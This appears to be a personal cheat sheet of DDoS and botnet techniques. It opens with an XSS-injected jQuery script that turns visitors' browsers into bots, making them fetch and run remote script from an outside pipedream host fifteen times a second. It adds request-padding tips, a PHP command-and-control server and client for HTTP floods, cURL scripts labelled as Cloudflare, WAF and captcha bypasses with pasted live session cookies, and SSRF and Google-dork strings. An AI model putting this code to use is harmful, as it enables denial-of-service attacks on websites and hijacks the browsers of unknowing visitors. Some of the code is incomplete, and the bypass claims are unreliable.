Botnet

jQuery browser zombie 7 layer(XSS)

 

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
    <script>
        setInterval(function() {
            // 15 async request per second(1000 milisecond)
            $(document).ready(function(){
                //5
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                //10
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                //15
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
            });
        }, 1000);
    </script>

- Turn client browser into botnet, 15 HTTP request GET per second, also you can combine with use url with huge size of HTTP header request like GET parameter in url using 🔟(4 byte) character to make a huge HTTP request size

 

Huge byte Unicode(STRESS)

 

- 🔟(4 byte)

GET method (maximum is 2000 character)

- 🔟 x 1000(4000 byte or 4 kb)

- 🔟 x 2000(8000 byte or 8 kb)

POST method (must display your input if not its useless)

- 🔟 x 10.000(40.000 byte or 40 kb)

- 🔟 x 100.000(400.000 byte or 400 kb)

- 🔟 x 1.000.000(4.000.000 byte or 4.000 kb or 4 MB)

PHP Botnet 7 layer C&C

 

- server.php
<?php

ini_set('error_reporting', E_ALL ^ E_NOTICE);
ini_set('display_errors', 1);

// Set time limit to indefinite execution
set_time_limit(0);

// Set the ip and port we will listen on
$address = '127.0.0.1';
$port = 6901;

ob_implicit_flush();

// Create a TCP Stream socket
$sock = socket_create(AF_INET, SOCK_STREAM, 0);

// Bind the socket to an address/port
socket_bind($sock, $address, $port) or die('Could not bind to address');

// Start listening for connections
socket_listen($sock);

// Non block socket type
socket_set_nonblock($sock);

// Clients
$clients = [];

//time
$time = 0;

//command 1.http(HTTP flood)
$command = "http";

while(true){
    // Accept new connections
    if ($newsock = socket_accept($sock)) {
        if (is_resource($newsock)) {
            // Non bloco for the new connection
            socket_set_nonblock($newsock);
            // Do something on the server side
            echo "New client connected\n";
            // Append the new connection to the clients array
            $clients[] = $newsock;
            echo $newsock."\n__________________________________________________________________\n";
            print_r($clients);
            echo "\n__________________________________________________________________\n";
        }
    }

        // Polling for new messages
    if (count($clients)) {
        foreach ($clients AS $k => $v) {
            // Check for new messages
            if ($char = socket_read($v, 1024)) {
               echo "$k:$char\n";
            }
        }
    }

    //if already 1 minutes socket_accept closed
    if($time == 60){
        echo "\n__________________________________________________________________\n";
        echo "Socket closed, total client connected :".count($clients);
        foreach ($clients as $key => $value) {
            socket_write($value, $command, strlen($command));
        }
        break;
    }
    sleep(1);
    $time+=1;
}

// Close the master sockets
socket_close($sock);
?>

- client.php

<?php  
$host    = "127.0.0.1";
$port    = 6901;
$message = "Hello Server";
echo "Message To server :".$message."\n";
// create socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create socket\n");
// connect to server
$result = socket_connect($socket, $host, $port) or die("Could not connect to server\n");  
// send string to server
socket_write($socket, $message, strlen($message)) or die("Could not send data to server\n");
// get server response
$result = socket_read ($socket, 1024) or die("Could not read server response\n");
echo "Command from server:".$result."\n";
if($result == "http"){
    while(true){
        echo "HTTP flood";
        sleep(1);
    }
}else{
    echo"gagal";
    socket_close($socket);
}
?>

Bypass 301,302,Cloudflare and WAF

<?php  
$url = 'google.com';
$cookiesIn = '';
$options = array(
            CURLOPT_RETURNTRANSFER => true,     // return web page
            CURLOPT_HEADER         => true,     //return headers in addition to content
            CURLOPT_FOLLOWLOCATION => true,     // follow redirects
            CURLOPT_ENCODING       => "",       // handle all encodings
            CURLOPT_AUTOREFERER    => true,     // set referer on redirect
            CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
            CURLOPT_TIMEOUT        => 120,      // timeout on response
            CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
            CURLINFO_HEADER_OUT    => true,
            CURLOPT_SSL_VERIFYPEER => true,     // Validate SSL Certificates
            CURLOPT_HTTP_VERSION   => CURL_HTTP_VERSION_1_1,
            CURLOPT_COOKIE         => $cookiesIn
        );

$ch      = curl_init( $url );
curl_setopt_array( $ch, $options );
$rough_content = curl_exec( $ch );
$err     = curl_errno( $ch );
$errmsg  = curl_error( $ch );
$header  = curl_getinfo( $ch );
curl_close( $ch );

$header_content = substr($rough_content, 0, $header['header_size']);
$body_content = trim(str_replace($header_content, '', $rough_content));
$pattern = "#Set-Cookie:\\s+(?<cookie>[^=]+=[^;]+)#m";
preg_match_all($pattern, $header_content, $matches);
$cookiesOut = implode("; ", $matches['cookie']);

$header['errno']   = $err;
$header['errmsg']  = $errmsg;
$header['headers']  = $header_content;
$header['content'] = $body_content;
$header['cookies'] = $cookiesOut;
print_r($header);
?>

Captcha,veirfy human bypass

<?php  
$url = 'https://www.000webhost.com/';
$cookiesIn = '';
$options = array(
            CURLOPT_RETURNTRANSFER => true,     // return web page
            CURLOPT_HEADER         => true,     //return headers in addition to content
            CURLOPT_FOLLOWLOCATION => true,     // follow redirects
            CURLOPT_ENCODING       => "",       // handle all encodings
            CURLOPT_AUTOREFERER    => true,     // set referer on redirect
            CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
            CURLOPT_TIMEOUT        => 120,      // timeout on response
            CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
            CURLINFO_HEADER_OUT    => true,
            CURLOPT_SSL_VERIFYPEER => true,     // Validate SSL Certificates
            CURLOPT_HTTP_VERSION   => CURL_HTTP_VERSION_1_1,
            CURLOPT_COOKIE         => $cookiesIn,
            CURLOPT_HTTPHEADER     => array(
                'Host: www.000webhost.com',
                'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0',
                'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
                'Accept-Language: en-US,en;q=0.5',
                'Accept-Encoding: gzip, deflate, br',
                'Alt-Used: www.000webhost.com',
                'Connection: keep-alive',
                'Cookie: cf_clearance=YtsqZDKEGfPKQ8XAvPAWEeSJl9aLyN6voDla5MvXelw-1676895164-0-250; _gcl_au=1.1.301076138.1673967752; _ga_4X6HMPKXDF=GS1.1.1676895166.14.1.1676896117.0.0.0; _ga=GA1.2.2110601089.1673967754; _omappvp=aQxuBVJHk1BfewR3QjHLZ3TnMIlR5eOJwL3jqzBlfgTs9NxDUTGYEFOMQuaeaOG4BbYxJN5hMHkereC8S4r1w0aELDUnxCgi; _vwo_uuid_v2=D4565647E417E7056A67C081977B1B9FC|a6414cb3e089ddda96c8f1ab7eb3d83f; _fbp=fb.1.1673967764940.184116151; _hjSessionUser_1471681=eyJpZCI6IjJhNWJmZWNjLTgyYTItNWYzMS1iOGVmLTk2YWU0ZDBhM2NlMiIsImNyZWF0ZWQiOjE2NzM5Njc3NjQ4NDAsImV4aXN0aW5nIjp0cnVlfQ==; sg_cookies={%225618039%22:{%22vid%22:%229542e2b8-b56e-4ab2-8713-f95b969b0b9c%22%2C%22lw%22:%222-8-13-46%22%2C%22rf%22:%22%22%2C%22pw%22:21%2C%22tc%22:229%2C%22tv%22:7%2C%22fp%22:642974284%2C%22ts%22:6964%2C%22tmp%22:6964%2C%22si%22:%22331939e0-858f-4740-ad72-bafb30a07a07%22}}; cookiebar=hide; PHPSESSID=455e0846e95563915655b288cad0aa7a; _gid=GA1.2.346653806.1676895167; _hjIncludedInSessionSample_1471681=1; _hjSession_1471681=eyJpZCI6IjM5NWQ2YzJiLWUzYzgtNDNlNC1iY2I1LTQ2ZjJhMjZmNmFmMiIsImNyZWF0ZWQiOjE2NzY4OTUxNjcwNTIsImluU2FtcGxlIjp0cnVlfQ==; _hjAbsoluteSessionInProgress=0; discount-popup-with-counter=hide',
                'Upgrade-Insecure-Requests: 1',
                'Sec-Fetch-Dest: document',
                'Sec-Fetch-Mode: navigate',
                'Sec-Fetch-Site: none',
                'Sec-Fetch-User: ?1',
                'Cache-Control: max-age=0',
                'TE: trailers'
            )
        );

$ch      = curl_init( $url );
curl_setopt_array( $ch, $options );
$rough_content = curl_exec( $ch );
$err     = curl_errno( $ch );
$errmsg  = curl_error( $ch );
$header  = curl_getinfo( $ch );
curl_close( $ch );

$header_content = substr($rough_content, 0, $header['header_size']);
$body_content = trim(str_replace($header_content, '', $rough_content));
$pattern = "#Set-Cookie:\\s+(?<cookie>[^=]+=[^;]+)#m";
preg_match_all($pattern, $header_content, $matches);
$cookiesOut = implode("; ", $matches['cookie']);

$header['errno']   = $err;
$header['errmsg']  = $errmsg;
$header['headers']  = $header_content;
$header['content'] = $body_content;
$header['cookies'] = $cookiesOut;
print_r($header);
?>

Server side request forgery(SSRF)

- intext:reverse image search

xmlrpc.php

- "index of" inurl:wp-content/"